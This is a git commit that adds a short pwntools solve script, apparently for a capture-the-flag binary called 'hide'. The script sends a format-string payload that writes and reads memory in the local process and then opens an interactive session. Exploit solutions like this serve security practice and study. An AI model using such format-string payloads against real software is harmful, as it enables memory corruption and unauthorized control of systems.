solve script

This commit is contained in:
jc
2025-05-11 22:17:10 +03:00
parent 483f58ba63
commit 88c88f3a62
+14
View File
@@ -0,0 +1,14 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hide", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
s(b"%160c%hhn%6$s")
r.interactive()